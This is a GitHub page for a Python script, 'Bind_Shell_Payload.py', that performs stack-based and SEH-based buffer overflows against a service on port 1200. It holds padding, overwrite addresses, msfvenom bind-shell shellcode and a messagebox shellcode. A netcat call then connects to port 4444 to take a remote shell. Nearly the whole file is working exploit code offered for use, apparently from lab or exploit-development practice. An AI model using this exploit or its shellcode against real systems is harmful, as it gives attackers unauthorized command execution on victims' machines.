-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathBind_Shell_Payload.py
43 lines (32 loc) · 3.22 KB
/
Bind_Shell_Payload.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Code to perform Stack Based and SEH based Buffer Overflow and get Shell access.
import time
import socket
import subprocess
host = '127.0.0.1' # Ip Address of the Target Machine
port = 1200 # Open port on the Server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port)) # Connecting to the Port on target machine
# Stack-Based Buffer Overflow
junk = b"A"*548 # Number of A's to send
EIP = b'\xdf\x11\x0c\x61' # JMP EIP Address
move_esp = b'\x81\xc4\xc0\xfd\xff\xff'
# Creating a bind_tcp Shellcode using metasploit.
# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=4444 -b '\x00\x0a\x0d' -f c
bind_tcp = b'\xba\x72\xdf\x28\xc5\xdb\xc2\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x53\x31\x56\x12\x03\x56\x12\x83\xb4\xdb\xca\x30\xc4\x0c\x88\xbb\x34\xcd\xed\x32\xd1\xfc\x2d\x20\x92\xaf\x9d\x22\xf6\x43\x55\x66\xe2\xd0\x1b\xaf\x05\x50\x91\x89\x28\x61\x8a\xea\x2b\xe1\xd1\x3e\x8b\xd8\x19\x33\xca\x1d\x47\xbe\x9e\xf6\x03\x6d\x0e\x72\x59\xae\xa5\xc8\x4f\xb6\x5a\x98\x6e\x97\xcd\x92\x28\x37\xec\x77\x41\x7e\xf6\x94\x6c\xc8\x8d\x6f\x1a\xcb\x47\xbe\xe3\x60\xa6\x0e\x16\x78\xef\xa9\xc9\x0f\x19\xca\x74\x08\xde\xb0\xa2\x9d\xc4\x13\x20\x05\x20\xa5\xe5\xd0\xa3\xa9\x42\x96\xeb\xad\x55\x7b\x80\xca\xde\x7a\x46\x5b\xa4\x58\x42\x07\x7e\xc0\xd3\xed\xd1\xfd\x03\x4e\x8d\x5b\x48\x63\xda\xd1\x13\xec\x2f\xd8\xab\xec\x27\x6b\xd8\xde\xe8\xc7\x76\x53\x60\xce\x81\x94\x5b\xb6\x1d\x6b\x64\xc7\x34\xa8\x30\x97\x2e\x19\x39\x7c\xae\xa6\xec\xe9\xa6\x01\x5f\x0c\x4b\xf1\x0f\x90\xe3\x9a\x45\x1f\xdc\xbb\x65\xf5\x75\x53\x98\xf6\x68\xf8\x15\x10\xe0\x10\x70\x8a\x9c\xd2\xa7\x03\x3b\x2c\x82\x3b\xab\x65\xc4\xfc\xd4\x75\xc2\xaa\x42\xfe\x01\x6f\x73\x01\x0c\xc7\xe4\x96\xda\x86\x47\x06\xda\x82\x3f\xab\x49\x49\xbf\xa2\x71\xc6\xe8\xe3\x44\x1f\x7c\x1e\xfe\x89\x62\xe3\x66\xf1\x26\x38\x5b\xfc\xa7\xcd\xe7\xda\xb7\x0b\xe7\x66\xe3\xc3\xbe\x30\x5d\xa2\x68\xf3\x37\x7c\xc6\x5d\xdf\xf9\x24\x5e\x99\x05\x61\x28\x45\xb7\xdc\x6d\x7a\x78\x89\x79\x03\x64\x29\x85\xde\x2c\x57\x77\xd2\xb8\xc0\x2e\x87\x80\x8c\xd0\x72\xc6\xa8\x52\x76\xb7\x4e\x4a\xf3\xb2\x0b\xcc\xe8\xce\x04\xb9\x0e\x7c\x24\xe8'
# shellcode for displaying a messagebox.
msg_box = b'\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7'
# For SEH Based
junk_seh=b'A'*636 # Number of A's to send
nextseh=b'\xeb\x04\x90\x90' # 4 byte JMP Address
seh=b'\x0b\x14\x0c\x61' # Address of SEH
nops=b'\x90'*4
# To run SEH Based exploit umcomment the following SEH Based exploit and comment the Stack Based exploit.
#s.sendall(junk+EIP+move_esp+msg_box)
#s.sendall(junk_seh+nextseh+seh+nops+msg_box) # SEH Base Exploit
s.sendall(junk+EIP+move_esp+bind_tcp) # STACK-Based Exploit
#s.close() # Closing Port 1200
print("The message has been sent.")
time.sleep(10) # Time delay of 10sec
# Calling Netcat command to connect port 4444 and get the shellof target machine.
from subprocess import call
call(["nc","192.168.1.205","4444"])